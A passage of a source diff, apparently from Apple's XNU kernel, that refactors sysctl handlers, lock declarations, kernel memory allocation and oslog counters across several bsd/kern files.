CTLTYPE_NODE | CTLFLAG_R * instead. */ -/* - * Validate parameters and get old / set new parameters - * for an integer-valued sysctl function. - */ -int -sysctl_int(user_addr_t oldp, size_t *oldlenp, - user_addr_t newp, size_t newlen, int *valp) -{ - int error = 0; - - if (oldp != USER_ADDR_NULL && oldlenp == NULL) { - return EFAULT; - } - if (oldp && *oldlenp < sizeof(int)) { - return ENOMEM; - } - if (newp && newlen != sizeof(int)) { - return EINVAL; - } - *oldlenp = sizeof(int); - if (oldp) { - error = copyout(valp, oldp, sizeof(int)); - } - if (error == 0 && newp) { - error = copyin(newp, valp, sizeof(int)); - AUDIT_ARG(value32, *valp); - } - return error; -} - -/* - * Validate parameters and get old / set new parameters - * for an quad(64bit)-valued sysctl function. - */ -int -sysctl_quad(user_addr_t oldp, size_t *oldlenp, - user_addr_t newp, size_t newlen, quad_t *valp) -{ - int error = 0; - - if (oldp != USER_ADDR_NULL && oldlenp == NULL) { - return EFAULT; - } - if (oldp && *oldlenp < sizeof(quad_t)) { - return ENOMEM; - } - if (newp && newlen != sizeof(quad_t)) { - return EINVAL; - } - *oldlenp = sizeof(quad_t); - if (oldp) { - error = copyout(valp, oldp, sizeof(quad_t)); - } - if (error == 0 && newp) { - error = copyin(newp, valp, sizeof(quad_t)); - } - return error; -} - STATIC int sysdoproc_filt_KERN_PROC_PID(proc_t p, void * arg) { @@ -2290,6 +2225,9 @@ SYSCTL_INT(_kern, OID_AUTO, num_taskthreads, SYSCTL_LONG(_kern, OID_AUTO, num_recycledvnodes, CTLFLAG_RD | CTLFLAG_LOCKED, &num_recycledvnodes, ""); +SYSCTL_COMPAT_INT(_kern, OID_AUTO, free_vnodes, + CTLFLAG_RD | CTLFLAG_LOCKED, + &freevnodes, 0, ""); STATIC int sysctl_maxvnodes(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) @@ -3434,8 +3372,9 @@ SYSCTL_PROC(_debug, #include #include -extern lck_grp_t * sysctl_debug_test_stackshot_owner_grp; /* used for both mutexes and rwlocks */ -extern lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx; /* used to protect lck_*_init */ +static LCK_GRP_DECLARE(sysctl_debug_test_stackshot_owner_grp, "test-stackshot-owner-grp"); +static LCK_MTX_DECLARE(sysctl_debug_test_stackshot_owner_init_mtx, + &sysctl_debug_test_stackshot_owner_grp); /* This is a sysctl for testing collection of owner info on a lock in kernel space. A multi-threaded * test from userland sets this sysctl in such a way that a thread blocks in kernel mode, and a @@ -3462,17 +3401,17 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus long long mtx_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_lck); int error = sysctl_io_number(req, mtx_unslid_addr, sizeof(long long), (void*)&option, NULL); - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!sysctl_debug_test_stackshot_mtx_inited) { lck_mtx_init(&sysctl_debug_test_stackshot_owner_lck, - sysctl_debug_test_stackshot_owner_grp, + &sysctl_debug_test_stackshot_owner_grp, LCK_ATTR_NULL); semaphore_create(kernel_task, &sysctl_debug_test_stackshot_mutex_sem, SYNC_POLICY_FIFO, 0); sysctl_debug_test_stackshot_mtx_inited = 1; } - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!error) { switch (option) { @@ -3489,15 +3428,15 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus semaphore_signal(sysctl_debug_test_stackshot_mutex_sem); break; case SYSCTL_DEBUG_MTX_TEARDOWN: - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); lck_mtx_destroy(&sysctl_debug_test_stackshot_owner_lck, - sysctl_debug_test_stackshot_owner_grp); + &sysctl_debug_test_stackshot_owner_grp); semaphore_destroy(kernel_task, sysctl_debug_test_stackshot_mutex_sem); sysctl_debug_test_stackshot_mtx_inited = 0; - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); break; case -1: /* user just wanted to read the value, so do nothing */ break; @@ -3543,10 +3482,10 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus long long rwlck_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_rwlck); int error = sysctl_io_number(req, rwlck_unslid_addr, sizeof(long long), (void*)&option, NULL); - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!sysctl_debug_test_stackshot_rwlck_inited) { lck_rw_init(&sysctl_debug_test_stackshot_owner_rwlck, - sysctl_debug_test_stackshot_owner_grp, + &sysctl_debug_test_stackshot_owner_grp, LCK_ATTR_NULL); semaphore_create(kernel_task, &sysctl_debug_test_stackshot_rwlck_sem, @@ -3554,7 +3493,7 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus 0); sysctl_debug_test_stackshot_rwlck_inited = 1; } - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!error) { switch (option) { @@ -3580,15 +3519,15 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus semaphore_signal(sysctl_debug_test_stackshot_rwlck_sem); break; case SYSCTL_DEBUG_KRWLCK_TEARDOWN: - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); lck_rw_destroy(&sysctl_debug_test_stackshot_owner_rwlck, - sysctl_debug_test_stackshot_owner_grp); + &sysctl_debug_test_stackshot_owner_grp); semaphore_destroy(kernel_task, sysctl_debug_test_stackshot_rwlck_sem); sysctl_debug_test_stackshot_rwlck_inited = 0; - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); break; case -1: /* user just wanted to read the value, so do nothing */ break; @@ -4343,20 +4282,24 @@ extern int vm_page_delayed_work_ctx_needed; SYSCTL_INT(_vm, OID_AUTO, vm_page_needed_delayed_work_ctx, CTLFLAG_RD | CTLFLAG_LOCKED, &vm_page_delayed_work_ctx_needed, 0, ""); /* log message counters for persistence mode */ -extern uint32_t oslog_p_total_msgcount; -extern uint32_t oslog_p_metadata_saved_msgcount; -extern uint32_t oslog_p_metadata_dropped_msgcount; -extern uint32_t oslog_p_error_count; -extern uint32_t oslog_p_saved_msgcount; -extern uint32_t oslog_p_dropped_msgcount; -extern uint32_t oslog_p_boot_dropped_msgcount; -extern uint32_t oslog_p_coprocessor_total_msgcount; -extern uint32_t oslog_p_coprocessor_dropped_msgcount; +SCALABLE_COUNTER_DECLARE(oslog_p_total_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_metadata_saved_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_metadata_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_error_count); +SCALABLE_COUNTER_DECLARE(oslog_p_saved_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_boot_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_total_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_unresolved_kc_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_fmt_invalid_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_fmt_max_args_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_truncated_msgcount); /* log message counters for streaming mode */ extern uint32_t oslog_s_total_msgcount; extern uint32_t oslog_s_metadata_msgcount; -extern uint32_t oslog_s_error_count; +SCALABLE_COUNTER_DECLARE(oslog_s_error_count); extern uint32_t oslog_s_streamed_msgcount; extern uint32_t oslog_s_dropped_msgcount; @@ -4369,19 +4312,24 @@ extern uint32_t oslog_msgbuf_dropped_charcount; extern uint32_t vaddlog_msgcount; extern uint32_t vaddlog_msgcount_dropped; -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_total_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_saved_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_dropped_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_error_count, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_saved_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_dropped_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_boot_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_boot_dropped_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_total_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_dropped_msgcount, 0, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_total_msgcount, oslog_p_total_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_saved_msgcount, oslog_p_metadata_saved_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_dropped_msgcount, oslog_p_metadata_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_error_count, oslog_p_error_count, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_saved_msgcount, oslog_p_saved_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_dropped_msgcount, oslog_p_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_boot_dropped_msgcount, oslog_p_boot_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_total_msgcount, oslog_p_coprocessor_total_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_dropped_msgcount, oslog_p_coprocessor_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_unresolved_kc_msgcount, oslog_p_unresolved_kc_msgcount, ""); + +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_invalid_msgcount, oslog_p_fmt_invalid_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_max_args_msgcount, oslog_p_fmt_max_args_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_truncated_msgcount, oslog_p_truncated_msgcount, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_total_msgcount, 0, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_metadata_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_metadata_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_s_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_error_count, 0, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_s_error_count, oslog_s_error_count, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_streamed_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_streamed_msgcount, 0, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_dropped_msgcount, 0, ""); @@ -4687,6 +4635,8 @@ SYSCTL_QUAD(_kern, OID_AUTO, driverkit_checkin_timed_out, &driverkit_checkin_timed_out, "timestamp of dext checkin timeout"); #endif +extern int IOGetVMMPresent(void); + static int hv_vmm_present SYSCTL_HANDLER_ARGS { @@ -4696,11 +4646,7 @@ hv_vmm_present SYSCTL_HANDLER_ARGS int hv_vmm_present = 0; -#if defined (__arm64__) - /* Need a way to determine if ARM xnu is running as a guest */ -#elif defined (__x86_64__) - hv_vmm_present = cpuid_vmm_present(); -#endif + hv_vmm_present = IOGetVMMPresent(); return SYSCTL_OUT(req, &hv_vmm_present, sizeof(hv_vmm_present)); } @@ -4810,7 +4756,7 @@ SYSCTL_PROC(_kern, OID_AUTO, sysent_const_check, #endif #if DEVELOPMENT || DEBUG -SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 1, ""); +SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_KERN, NULL, 1, ""); #else SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 0, ""); #endif @@ -5569,52 +5515,59 @@ sysctl_get_owned_vmobjects SYSCTL_HANDLER_ARGS mach_port_name_t task_port_name; task_t task; size_t buffer_size = (req->oldptr != USER_ADDR_NULL) ? req->oldlen : 0; - vmobject_list_output_t buffer; + vmobject_list_output_t buffer = NULL; size_t output_size; size_t entries; + /* we have a "newptr" (for write) we get a task port name from the caller. */ + error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t)); + + if (error != 0) { + goto sysctl_get_vmobject_list_exit; + } + + task = port_name_to_task_read(task_port_name); + if (task == TASK_NULL) { + error = ESRCH; + goto sysctl_get_vmobject_list_exit; + } + + /* get the current size */ + task_copy_vmobjects(task, NULL, 0, &entries); + size_t max_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0; + + /* if buffer_size is specified clamp to the current size then allcoate the kernel buffer */ if (buffer_size) { if (buffer_size < sizeof(*buffer) + sizeof(vm_object_query_data_t)) { - return ENOMEM; + error = ENOMEM; + goto sysctl_get_vmobject_list_deallocate_and_exit; } + buffer_size = (buffer_size > max_size) ? max_size : buffer_size; buffer = kheap_alloc(KHEAP_TEMP, buffer_size, Z_WAITOK); if (!buffer) { error = ENOMEM; - goto sysctl_get_vmobject_list_exit; + goto sysctl_get_vmobject_list_deallocate_and_exit; } } else { buffer = NULL; } - /* we have a "newptr" (for write) we get a task port name from the caller. */ - error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t)); - - if (error != 0) { - goto sysctl_get_vmobject_list_exit; - } - - task = port_name_to_task(task_port_name); - if (task == TASK_NULL) { - error = ESRCH; - goto sysctl_get_vmobject_list_exit; - } - /* copy the vmobjects and vmobject data out of the task */ if (buffer_size == 0) { - task_copy_vmobjects(task, NULL, 0, &entries); - output_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0; + output_size = max_size; } else { task_copy_vmobjects(task, &buffer->data[0], buffer_size - sizeof(*buffer), &entries); buffer->entries = (uint64_t)entries; output_size = entries * sizeof(vm_object_query_data_t) + sizeof(*buffer); } - task_deallocate(task); - error = SYSCTL_OUT(req, (char*) buffer, output_size); +sysctl_get_vmobject_list_deallocate_and_exit: + task_deallocate(task); + sysctl_get_vmobject_list_exit: if (buffer) { kheap_free(KHEAP_TEMP, buffer, buffer_size); @@ -5626,3 +5579,20 @@ sysctl_get_vmobject_list_exit: SYSCTL_PROC(_vm, OID_AUTO, get_owned_vmobjects, CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_WR | CTLFLAG_MASKED | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, 0, 0, sysctl_get_owned_vmobjects, "A", "get owned vmobjects in task"); + +extern uint64_t num_static_scalable_counters; +SYSCTL_QUAD(_kern, OID_AUTO, num_static_scalable_counters, CTLFLAG_RD | CTLFLAG_LOCKED, &num_static_scalable_counters, ""); + +uuid_string_t trial_treatment_id; +uuid_string_t trial_experiment_id; +int trial_deployment_id = -1; + +SYSCTL_STRING(_kern, OID_AUTO, trial_treatment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_treatment_id, sizeof(trial_treatment_id), ""); +SYSCTL_STRING(_kern, OID_AUTO, trial_experiment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_experiment_id, sizeof(trial_experiment_id), ""); +SYSCTL_INT(_kern, OID_AUTO, trial_deployment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, &trial_deployment_id, 0, ""); + +#if DEVELOPMENT || DEBUG +/* For unit testing setting factors & limits. */ +unsigned int testing_experiment_factor; +EXPERIMENT_FACTOR_UINT(_kern, testing_experiment_factor, &testing_experiment_factor, 5, 10, ""); +#endif /* DEVELOPMENT || DEBUG */ diff --git a/bsd/kern/kern_time.c b/bsd/kern/kern_time.c index eac338d17..f67864797 100644 --- a/bsd/kern/kern_time.c +++ b/bsd/kern/kern_time.c @@ -95,15 +95,12 @@ #define HZ 100 /* XXX */ /* simple lock used to access timezone, tz structure */ -lck_spin_t * tz_slock; -lck_grp_t * tz_slock_grp; -lck_attr_t * tz_slock_attr; -lck_grp_attr_t *tz_slock_grp_attr; +static LCK_GRP_DECLARE(tz_slock_grp, "tzlock"); +static LCK_SPIN_DECLARE(tz_slock, &tz_slock_grp); static void setthetime( struct timeval *tv); -void time_zone_slock_init(void); static boolean_t timeval_fixusec(struct timeval *t1); /* @@ -151,9 +148,9 @@ gettimeofday( } if (uap->tzp) { - lck_spin_lock(tz_slock); + lck_spin_lock(&tz_slock); ltz = tz; - lck_spin_unlock(tz_slock); + lck_spin_unlock(&tz_slock); error = copyout((caddr_t)<z, CAST_USER_ADDR_T(uap->tzp), sizeof(tz)); } @@ -224,9 +221,9 @@ settimeofday(__unused struct proc *p, struct settimeofday_args *uap, __unused i setthetime(&atv); } if (uap->tzp) { - lck_spin_lock(tz_slock); + lck_spin_lock(&tz_slock); tz = atz; - lck_spin_unlock(tz_slock); + lck_spin_unlock(&tz_slock); } return 0; } @@ -921,21 +918,6 @@ ppsratecheck(struct timeval *lasttime, int *curpps, int maxpps) } #endif /* NETWORKING */ -void -time_zone_slock_init(void) -{ - /* allocate lock group attribute and group */ - tz_slock_grp_attr = lck_grp_attr_alloc_init(); - - tz_slock_grp = lck_grp_alloc_init("tzlock", tz_slock_grp_attr); - - /* Allocate lock attribute */ - tz_slock_attr = lck_attr_alloc_init(); - - /* Allocate the spin lock */ - tz_slock = lck_spin_alloc_init(tz_slock_grp, tz_slock_attr); -} - int __mach_bridge_remote_time(__unused struct proc *p, struct __mach_bridge_remote_time_args *mbrt_args, uint64_t *retval) { diff --git a/bsd/kern/kern_xxx.c b/bsd/kern/kern_xxx.c index 2e111de75..2a7942ce9 100644 --- a/bsd/kern/kern_xxx.c +++ b/bsd/kern/kern_xxx.c @@ -154,7 +154,7 @@ skip_cred_check: } extern void OSKextResetAfterUserspaceReboot(void); -extern void zone_gc(boolean_t); +extern void zone_gc_drain(void); int usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retval) @@ -184,7 +184,7 @@ usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retva int shm_error = pshm_cache_purge_all(p); int sem_error = psem_cache_purge_all(p); - zone_gc(FALSE); + zone_gc_drain(); return shm_error != 0 ? shm_error : sem_error; } diff --git a/bsd/kern/kpi_mbuf.c b/bsd/kern/kpi_mbuf.c index 8cd16e220..8e1d821ce 100644 --- a/bsd/kern/kpi_mbuf.c +++ b/bsd/kern/kpi_mbuf.c @@ -52,7 +52,7 @@ static const mbuf_flags_t mbuf_cflags_mask = (MBUF_EXT); #define MAX_MBUF_TX_COMPL_FUNC 32 mbuf_tx_compl_func mbuf_tx_compl_table[MAX_MBUF_TX_COMPL_FUNC]; -extern lck_rw_t *mbuf_tx_compl_tbl_lock; +extern lck_rw_t mbuf_tx_compl_tbl_lock; u_int32_t mbuf_tx_compl_index = 0; #if (DEVELOPMENT || DEBUG) @@ -1782,11 +1782,11 @@ get_tx_compl_callback_index(mbuf_tx_compl_func callback) { u_int32_t i; - lck_rw_lock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock); i = get_tx_compl_callback_index_locked(callback); - lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock); return i; } @@ -1800,9 +1800,9 @@ m_get_tx_compl_callback(u_int32_t idx) ASSERT(0); return NULL; } - lck_rw_lock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock); cb = mbuf_tx_compl_table[idx]; - lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock); return cb; } @@ -1816,7 +1816,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback) return EINVAL; } - lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock); i = get_tx_compl_callback_index_locked(callback); if (i != -1) { @@ -1834,7 +1834,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback) } } unlock: - lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock); return error; } @@ -1849,7 +1849,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback) return EINVAL; } - lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock); /* assume the worst */ error = ENOENT; @@ -1861,7 +1861,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback) } } unlock: - lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock); return error; } @@ -1950,9 +1950,9 @@ m_do_tx_compl_callback(struct mbuf *m, struct ifnet *ifp) continue; } - lck_rw_lock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock); callback = mbuf_tx_compl_table[i]; - lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock); if (callback != NULL) { callback(m->m_pkthdr.pkt_compl_context, diff --git a/bsd/kern/kpi_socket.c b/bsd/kern/kpi_socket.c index 30d0b513a..53f886c28 100644 --- a/bsd/kern/kpi_socket.c +++ b/bsd/kern/kpi_socket.c @@ -237,7 +237,7 @@ sock_bind(socket_t sock, const struct sockaddr *to) } if (to->sa_len > sizeof(ss)) { - MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME, M_WAITOK); + sa = kheap_alloc(KHEAP_TEMP, to->sa_len, Z_WAITOK); if (sa == NULL) { return ENOBUFS; } @@ -250,7 +250,7 @@ sock_bind(socket_t sock, const struct sockaddr *to) error = sobindlock(sock, sa, 1); /* will lock socket */ if (sa != NULL && want_free == TRUE) { - FREE(sa, M_SONAME); + kheap_free(KHEAP_TEMP, sa, sa->sa_len); } return error; @@ -270,8 +270,8 @@ sock_connect(socket_t sock, const struct sockaddr *to, int flags) } if (to->sa_len > sizeof(ss)) { - MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME, - (flags & MSG_DONTWAIT) ? M_NOWAIT : M_WAITOK); + sa = kheap_alloc(KHEAP_TEMP, to->sa_len, + (flags & MSG_DONTWAIT) ? Z_NOWAIT : Z_WAITOK); if (sa == NULL) { return ENOBUFS; } @@ -323,7 +323,7 @@ out: socket_unlock(sock, 1); if (sa != NULL && want_free == TRUE) { - FREE(sa, M_SONAME); + kheap_free(KHEAP_TEMP, sa, sa->sa_len); } return error; @@ -475,9 +475,8 @@ sogetaddr_locked(struct socket *so, struct sockaddr **psa, int peer) if (error == 0 && *psa == NULL) { error = ENOMEM; - } else if (error != 0 && *psa != NULL) { + } else if (error != 0) { FREE(*psa, M_SONAME); - *psa = NULL; } return error; } @@ -501,9 +500,7 @@ sock_getaddr(socket_t sock, struct sockaddr **psa, int peer) void sock_freeaddr(struct sockaddr *sa) { - if (sa != NULL) { - FREE(sa, M_SONAME); - } + FREE(sa, M_SONAME); } errno_t @@ -806,9 +803,7 @@ cleanup: if (control != NULL) { m_freem(control); } - if (fromsa != NULL) { - FREE(fromsa, M_SONAME); - } + FREE(fromsa, M_SONAME); return error; } diff --git a/bsd/kern/kpi_socketfilter.c b/bsd/kern/kpi_socketfilter.c index 4492cf15f..8c3976246 100644 --- a/bsd/kern/kpi_socketfilter.c +++ b/bsd/kern/kpi_socketfilter.c @@ -60,6 +60,12 @@ #define SFEF_NODETACH 0x2 /* Detach should not be called */ #define SFEF_NOSOCKET 0x4 /* Socket is gone */ +/* + * If you need accounting for KM_IFADDR consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_IFADDR KHEAP_DEFAULT + struct socket_filter_entry { struct socket_filter_entry *sfe_next_onsocket; struct socket_filter_entry *sfe_next_onfilter; @@ -85,9 +91,12 @@ struct socket_filter { TAILQ_HEAD(socket_filter_list, socket_filter); -static struct socket_filter_list sock_filter_head; -static lck_rw_t *sock_filter_lock = NULL; -static lck_mtx_t *sock_filter_cleanup_lock = NULL; +static LCK_GRP_DECLARE(sock_filter_lock_grp, "socket filter lock"); +static LCK_RW_DECLARE(sock_filter_lock, &sock_filter_lock_grp); +static LCK_MTX_DECLARE(sock_filter_cleanup_lock, &sock_filter_lock_grp); + +static struct socket_filter_list sock_filter_head = + TAILQ_HEAD_INITIALIZER(sock_filter_head); static struct socket_filter_entry *sock_filter_cleanup_entries = NULL; static thread_t sock_filter_cleanup_thread = NULL; @@ -143,26 +152,6 @@ sflt_permission_check(struct inpcb *inp) return 0; } -__private_extern__ void -sflt_init(void) -{ - lck_grp_attr_t *grp_attrib = NULL; - lck_attr_t *lck_attrib = NULL; - lck_grp_t *lck_group = NULL; - - TAILQ_INIT(&sock_filter_head); - - /* Allocate a rw lock */ - grp_attrib = lck_grp_attr_alloc_init(); - lck_group = lck_grp_alloc_init("socket filter lock", grp_attrib); - lck_grp_attr_free(grp_attrib); - lck_attrib = lck_attr_alloc_init(); - sock_filter_lock = lck_rw_alloc_init(lck_group, lck_attrib); - sock_filter_cleanup_lock = lck_mtx_alloc_init(lck_group, lck_attrib); - lck_grp_free(lck_group); - lck_attr_free(lck_attrib); -} - static void sflt_retain_locked(struct socket_filter *filter) { @@ -175,14 +164,14 @@ sflt_release_locked(struct socket_filter *filter) if (os_ref_release_locked(&filter->sf_refcount) == 0) { /* Call the unregistered function */ if (filter->sf_filter.sf_unregistered) { - lck_rw_unlock_exclusive(sock_filter_lock); + lck_rw_unlock_exclusive(&sock_filter_lock); filter->sf_filter.sf_unregistered( filter->sf_filter.sf_handle); - lck_rw_lock_exclusive(sock_filter_lock); + lck_rw_lock_exclusive(&sock_filter_lock); } /* Free the entry */ - FREE(filter, M_IFADDR); + kheap_free(KM_IFADDR, filter, sizeof(struct socket_filter)); } } @@ -203,7 +192,7 @@ sflt_entry_release(struct socket_filter_entry *entry) /* That was the last reference */ /* Take the cleanup lock */ - lck_mtx_lock(sock_filter_cleanup_lock); + lck_mtx_lock(&sock_filter_cleanup_lock); /* Put this item on the cleanup list */ entry->sfe_next_oncleanup = sock_filter_cleanup_entries; @@ -222,7 +211,7 @@ sflt_entry_release(struct socket_filter_entry *entry) } /* Drop the cleanup lock */ - lck_mtx_unlock(sock_filter_cleanup_lock); + lck_mtx_unlock(&sock_filter_cleanup_lock); } else if (old <= 0) { panic("sflt_entry_release - sfe_refcount (%d) <= 0\n", (int)old); @@ -236,11 +225,11 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) { #pragma unused(blah, blah2) while (1) { - lck_mtx_lock(sock_filter_cleanup_lock); + lck_mtx_lock(&sock_filter_cleanup_lock); while (sock_filter_cleanup_entries == NULL) { /* Sleep until we've got something better to do */ msleep(&sock_filter_cleanup_entries, - sock_filter_cleanup_lock, PWAIT, + &sock_filter_cleanup_lock, PWAIT, "sflt_cleanup", NULL); } @@ -249,10 +238,10 @@ sflt_cleanup_thread(void *blah, wait_result_t blah2) sock_filter_cleanup_entries = NULL; /* Drop the lock */ - 